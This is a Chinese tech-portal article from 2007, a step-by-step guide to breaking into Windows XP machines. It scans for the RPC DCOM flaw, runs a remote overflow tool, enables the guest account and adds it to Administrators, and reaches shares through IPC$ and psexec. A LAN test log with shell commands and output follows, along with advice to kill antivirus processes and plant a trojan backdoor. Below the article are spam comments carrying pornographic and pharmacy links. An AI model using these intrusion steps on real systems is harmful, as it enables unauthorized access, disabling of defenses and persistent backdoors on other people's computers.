e800

专题： SaaS时代危机下的企业 JAVA语言百度竞价排名 Windows 7 刀片式服务器危机移动嵌入串串烧

更多精彩专题

专业存储

存储首页 | 存储管理 | 存储安全 | 存储技术 | 存储市场 | 解决方案 | 存储动态

入侵XP系统之初步攻略

2007-01-01 推荐:5871507 收藏:3808078 评论:15780 来源:软件屋,　

XP
系统
xp
XP系统

　　1.思路：突破xp系统远程访问的限制，实现文件传输和远程登陆。

　　2.工具：rpc漏洞扫描工具、溢出工具，pstools工具包。

　　3.步骤

　　1)步骤一:rpc漏洞扫描：

　　推荐使用retinarpcdcom.exe（eeye公司推出的专门针对RPC漏洞的扫描工具）

　　2)步骤二:远程溢出：

　　用xp.exe,溢出成功率极高。

　　3)步骤三:提升guest权限（本方案之关键）：

　　命令:net user guest /active:yes
　　net localgroup aministrators guest /add
————————————————————————————
如果你用net user guest命令，将会看到下面的内容：
Password required????????????No
这正是突破xp系统远程访问帐号限制的突破口！
除了guest外，其它帐号都是
Password required??????????yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
————————————————————————————
当guest提升为admin权限后，试试
dir \\IP\c$??
呵呵，现在你已经有了读写权限，连ipc$连接都省了~~
当然你也一样可以用net use \\ip "" /user:"guest"来进行IPC$连接

到此，文件传输的问题已经解决！

　　4)步骤四:远程登陆

我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \\ip guest "" 1 90
read ntlm failed??????????????????\\shit!用administrator也是这样子。

用psexec方便多了，命令如下：
psexec \\ip cmd??????

　　5)注意事项：

千万别在xp系统中建新帐户
xp系统默认只能登陆一个帐户，故用3389的远程登陆是不行的。
rpc溢出会导致对方重启，要慎用，尤其是服务器。

在内网里测试，首先用superscan扫了一个网段。
10.200.6.1——10.200.6.254，看看那些机子开放了 5000端口。
一般情况下这样的机子都是XP系统。好了，速度很快，出来一大片。
然后用RPC的溢出工具，打开，填入一个机子的IP地址，失败，可能已经打了补丁
没关系，继续来，终于有一个成功了

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

为了保险先安装一个后门，传个文件过去，这个方法很多。
TFTP，FTP，在命令行用脚本或者http下载都可以实现。
这个需要考虑对方有没有开杀毒软件，如果有的话先传个pulist.exe以及pslist.exe过去
先把杀毒软件的服务停止，然后杀掉进程，这时再传木马过去。

好了，我们先看看对方的用户信息
C:\WINDOWS\system32>net user
net user

\\ 的用户帐户
-----------------------------------------------------------------
Administrator????????????Guest????????????????????HelpAssistant
SUPPORT_388945a0
命令运行完毕，但发生一个或多个错误。

然后我们把guest激活并加入管理员组。
C:\WINDOWS\system32>net user guest /active:yes
net user guest /active:yes
命令成功完成。

C:\WINDOWS\system32>net localgroup administrators guest /add
net localgroup administrators guest /add
命令成功完成。

我们来看看guest的帐户信息
net user guest
用户名???????????????? Guest
全名
注释?????????????????? 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码???????? 000 (系统默认值)
帐户启用?????????????? Yes
帐户到期?????????????? 从不

上次设置密码?????????? 2003/11/28 下午 02:48
密码到期?????????????? 从不
密码可更改???????????? 2003/11/28 下午 02:48
需要密码?????????????? No
用户可以更改密码?????? No

允许的工作站?????????? All
登录脚本
用户配置文件
主目录
上次登录?????????????? 从不

可允许的登录小时数???? All

本地组成员???????????? *Administrators?????? *Guests
全局组成员???????????? *None
命令成功完成。

看看对方开的共享
C:\WINDOWS\system32>net share
net share

共享名?? 资源????????????????????????注释

------------------------------------------------------------
IPC$???????????????????????????????????????? 远程 IPC
G$?????????? G:\???????????????????????????? 默认共享
F$?????????? F:\???????????????????????????? 默认共享
ADMIN$?????? C:\WINDOWS??????????????????????远程管理
C$?????????? C:\???????????????????????????? 默认共享
E$?????????? E:\???????????????????????????? 默认共享
命令成功完成。

然后按照文章里的方法进行
C:\>dir \\10.200.6.183\c$
登录失败: 未授予用户在此计算机上的请求登录类型。

C:\>net use \\10.200.6.183\ipc$ "" /user:guest
系统发生 1385 错误。

登录失败: 未授予用户在此计算机上的请求登录类型。

重新在对方的shell里给guest设置了一个密码之后再看看
C:\>net use \\10.200.6.183\ipc$ "123456" /user:guest
系统发生 1385 错误。

登录失败: 未授予用户在此计算机上的请求登录类型。

用psexec \\10.200.6.183 cmd.exe 也不行~！！！
因为根本不能建立IPC连接。

您可以针对本文进行：[评论] [收藏] [推荐] [查看原文链接]

文章评论
共有15780条评论 点击查看更多评论

[15780楼] 2008-04-28 21:38:05.0 网友
[回复]
<a href= http://www.dotbb.be/phpbb21/?mforum=jamelyhenricoas >girls sucking cock</a> <a href= http://www.beepworld.it/members/jamelyhenricoas >blondes sucking cock</a> <a href= http://ferryguisilande.proboards84.com >pussy sucking</a>
[15779楼] 2008-04-28 22:39:29.0 网友
[回复]
Best Online Pharmacy
<a href="http://www.youtube.com/DrJohnAdamson">Order Tramadol</a> <a href="http://www.youtube.com/DrJohnAdamson">Buy Tramadol</a>
[15778楼] 2008-04-28 22:38:36.0 网友
[回复]
Best Online Pharmacy
http://www.youtube.com/DrJohnAdamson Cheap Tramadol
[15777楼] 2008-04-28 22:38:35.0 网友
[回复]
Best Online Pharmacy
http://www.youtube.com/DrJohnAdamson Ultram Online [url=http://www.youtube.com/DrJohnAdamson]Buy Tramadol without a prescription[/url]
[15776楼] 2008-04-28 17:20:42.0 网友
[回复]
<a href= http://phpbbi.com/?mforum=martinvalabrung >young nude couples</a> <a href= http://phpbbi.com/?mforum=martinvalabrung >couple fucks babysitter</a> <a href= http://phpbbi.com/?mforum=martinvalabrung >couple fucks teen</a> <a href= http://phpbbi.com/?mforum=martinvalabrung >nude beach couples</a> <a href= http://phpbbi.com/?mforum=martinvalabrung >couples fucking teens</a> <a href= http://phpbbi.com/?mforum=martinvalabrung >black couples fucking free trailers</a> <a href= http/
[15775楼] 2008-04-28 15:16:43.0 网友
[回复]
<a href= http://members.fotki.com/penisenlargemen >penis enlargement</a> <a href= http://blog.ialweb.it/penissize >penis size</a> <a href= http://smallpenis.forumvila.com >small penis</a>
[15774楼] 2008-04-28 12:27:18.0 网友
[回复]
Bill you, as she kept moaning with <a href= http://amanda.b1.jcink.com >amanda bynes nude</a> his eyes, squeezed someinto.
[15773楼] 2008-04-28 11:00:20.0 网友
[回复]
<a href= http://index3.porins.com >draperys</a> <a href= http://index1.porins.com >christian athletes summer camp</a> <a href= http://index2.porins.com >wholesale sterling silver jewelry</a> <a href= http://index4.porins.com >greetings</a>
[15772楼] 2008-04-28 11:00:18.0 网友
[回复]
<a href= http://index3.erinta.com >justin clark</a> <a href= http://index2.erinta.com >paris hilton naked</a> <a href= http://index1.erinta.com >borzoi florida</a> <a href= http://index4.erinta.com >jimmy buffet at mohegan sun</a>
[15771楼] 2008-04-28 01:46:43.0 网友
[回复]
Peering in themoisture until he watchedlisa slide a minute. <a href= http://familylobby.com/charleypungher/custompage/customframe.asp?id=5061 >amateur gloryhole</a> I.